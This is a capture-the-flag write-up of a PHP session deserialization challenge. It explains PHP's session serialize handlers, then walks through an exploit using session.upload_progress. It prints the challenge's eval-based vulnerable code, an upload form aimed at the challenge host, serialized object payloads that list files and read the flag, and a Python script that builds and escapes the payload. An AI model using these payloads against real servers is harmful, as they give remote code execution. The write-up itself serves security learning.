Prerequisites
Session storage mechanism
PHP does not keep session contents in memory between requests; they are persisted by the backend selected with session.save_handler, and the default backend writes them to a file.
The file is named sess_<sessionid> (in session.save_path).
How the $_SESSION array is encoded inside that file is chosen by session.serialize_handler:
php: the default. Each entry is written as key|value, where the value is passed through PHP's serialization function.
php_serialize: the whole $_SESSION array is written as a single serialized value (available since PHP 5.5.4).
php_binary: for each entry, one byte whose value is the length of the key name, then the key name, then the serialized value.
Using session.upload_progress for file inclusion and deserialization attacks
For the background, see the freebuf article of the same name, "Using session.upload_progress for file inclusion and deserialization attacks".
Writeup
After opening the challenge and auditing the code, there are not many exploitable points.
The line ini_set('session.serialize_handler', 'php'); is the hint: the script forces the php handler for its own session_start(), so if the server's default handler is a different one, session data written by one handler is re-read by the other, and the vulnerability lies in how PHP deserializes the session object.
<?php
//A webshell is wait for you
// The script forces the 'php' serialize handler for its own session_start().
ini_set('session.serialize_handler', 'php');
session_start();
class OowoO
{
    public $mdzz;
    function __construct()
    {
        $this->mdzz = 'phpinfo();';
    }
    // Runs when the object is destroyed, including an object reconstructed by
    // unserializing session data: $mdzz is then attacker-controlled and is eval()'d.
    function __destruct()
    {
        eval($this->mdzz);
    }
}
if(isset($_GET['phpinfo']))
{
    $m = new OowoO();
}
else
{
    highlight_string(file_get_contents('index.php'));
}
?>
Then check phpinfo. session.upload_progress.enabled = On means the upload-progress feature is active: when a multipart/form-data POST carries a field named by session.upload_progress.name (default PHP_SESSION_UPLOAD_PROGRESS), PHP records details of the upload (start time, bytes processed, the uploaded file's name, and so on) in $_SESSION under the key session.upload_progress.prefix plus that field's value, and it does so while parsing the request, before the script itself runs. So simply POSTing a PHP_SESSION_UPLOAD_PROGRESS field together with a file upload puts the file's filename, which we control, into the session file. One caveat worth checking in the same phpinfo page: if session.upload_progress.cleanup is On (the PHP default), the record is removed as soon as the upload has been read, and the upload then has to be raced against the script's session_start().
Construct an upload form (the hidden field must be named PHP_SESSION_UPLOAD_PROGRESS; its value becomes the suffix of the session key, here upload_progress_777):
<form action="http://web.jarvisoj.com:32784/index.php" method="POST" enctype="multipart/form-data">
<!-- field name = session.upload_progress.name (default PHP_SESSION_UPLOAD_PROGRESS); value = key suffix -->
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="777" />
<input type="file" name="file" />
<input type="submit" />
</form>
Checking disable_functions in phpinfo shows that system() is disabled, so the directory has to be listed another way. The code to run goes into the mdzz property of a serialized OowoO object, and that object goes into the filename of the uploaded file. Remember to put | in front of it: the php handler reads everything up to the first | as the session key and unserializes whatever follows, so the prefix written by the other handler becomes a harmless key and our object becomes its value. Inside the multipart filename="..." the double quotes of the serialized object have to be escaped as \", otherwise PHP cuts the filename at the first one.
print_r(scandir(dirname(__FILE__)));
The web root can be read from _SERVER["SCRIPT_FILENAME"] on the phpinfo page; the directory listing reveals the flag file, which is then read with:
print_r(file_get_contents("/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php"));
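As an added example that is not part of the original writeup, the following Python script ties the two halves of the page together: it encodes one $_SESSION array in each of the three serialize_handler formats described under Session storage mechanism, builds the OowoO payload with correct byte lengths, and then shows the mismatch the exploit relies on, where a record written by php_serialize during the upload is re-read by the script's php handler, which takes everything up to the first | as the key and unserializes the rest into an OowoO object. The simplified shape of the upload_progress record and the names PhpUnserializer and decode_as_php_handler are assumptions made for illustration, not PHP internals or the challenge's code.

```python
"""Added example (not from the original writeup): the three serialize_handler formats,
and how a session record written by php_serialize is misread by the php handler.
Assumed for illustration: the simplified shape of the upload_progress record and
the names PhpUnserializer / decode_as_php_handler."""


def php_serialize(value) -> str:
    """Subset of PHP serialize(): bool, int, str (byte length) and array (dict)."""
    if isinstance(value, bool):
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, str):
        return f's:{len(value.encode())}:"{value}";'
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return f"a:{len(value)}:{{{body}}}"
    raise TypeError(f"unsupported type {type(value).__name__}")


# The same $_SESSION array under each session.serialize_handler setting.
def encode_php(session: dict) -> str:             # php: key|serialize(value) per entry
    return "".join(f"{k}|{php_serialize(v)}" for k, v in session.items())


def encode_php_binary(session: dict) -> str:      # php_binary: chr(len(key)) key serialize(value)
    return "".join(f"{chr(len(k))}{k}{php_serialize(v)}" for k, v in session.items())


def encode_php_serialize(session: dict) -> str:   # php_serialize: serialize($_SESSION)
    return php_serialize(session)


def oowoo_payload(php_code: str) -> str:
    """Filename value: the leading '|' makes the php handler unserialize what follows."""
    return f'|O:5:"OowoO":1:{{s:4:"mdzz";{php_serialize(php_code)}}}'


def multipart_filename(payload: str) -> str:
    # PHP's multipart parser ends filename="..." at the first unescaped double quote,
    # so quotes (and backslashes) inside the payload are backslash-escaped.
    return payload.replace("\\", "\\\\").replace('"', '\\"')


def upload_progress_record(field_value: str, filename: str) -> str:
    """Simplified (assumed) record that session.upload_progress stores, written by php_serialize."""
    session = {"upload_progress_" + field_value: {
        "done": False,
        "files": {0: {"field_name": "file", "name": filename}},
    }}
    return encode_php_serialize(session)


class PhpUnserializer:
    """Minimal unserialize() for i/b/s/a/O, enough to decode the records above."""

    def __init__(self, data: bytes, pos: int = 0):
        self.data, self.pos = data, pos

    def _until(self, ch: bytes) -> bytes:
        end = self.data.index(ch, self.pos)
        token, self.pos = self.data[self.pos:end], end + 1
        return token

    def _quoted(self) -> str:                     # N:"..." shared by s: and O:
        n = int(self._until(b":"))
        text = self.data[self.pos + 1:self.pos + 1 + n].decode()
        self.pos += n + 2                         # skip both quotes
        return text

    def value(self):
        kind, self.pos = self.data[self.pos:self.pos + 1], self.pos + 2
        if kind == b"i":
            return int(self._until(b";"))
        if kind == b"b":
            return self._until(b";") == b"1"
        if kind == b"s":
            text = self._quoted()
            self.pos += 1                         # ';'
            return text
        if kind in (b"a", b"O"):
            result = {}
            if kind == b"O":
                result["__class"] = self._quoted()
                self.pos += 1                     # ':' after the class name
            count = int(self._until(b":"))
            self.pos += 1                         # '{'
            for _ in range(count):
                key = self.value()
                result[key] = self.value()
            self.pos += 1                         # '}'
            return result
        raise ValueError(f"unsupported type {kind!r} at offset {self.pos}")


def decode_as_php_handler(record: str) -> dict:
    """Read a session file the way serialize_handler=php does: the key runs to the first
    '|', one serialized value follows; bytes after the last '|' are ignored."""
    data, session, pos = record.encode(), {}, 0
    while (bar := data.find(b"|", pos)) >= 0:
        parser = PhpUnserializer(data, bar + 1)
        session[data[pos:bar].decode()] = parser.value()
        pos = parser.pos
    return session


if __name__ == "__main__":
    record = upload_progress_record("777", oowoo_payload("print_r(scandir(dirname(__FILE__)));"))
    print(record)                         # what php_serialize wrote during the upload
    print(decode_as_php_handler(record))  # what index.php's session_start() reconstructs
```

Running it prints the php_serialize record first and then the single key/value pair the php handler recovers from it: the key is the serialized prefix up to the first |, and the value is an array carrying __class OowoO and mdzz set to the print_r call, which is the object whose __destruct the challenge then eval()s. To use the payload against the target, put multipart_filename(oowoo_payload(code)) into the filename= of the file part in the raw request (a browser will not send such a filename on its own) and send the PHP_SESSION_UPLOAD_PROGRESS field alongside it.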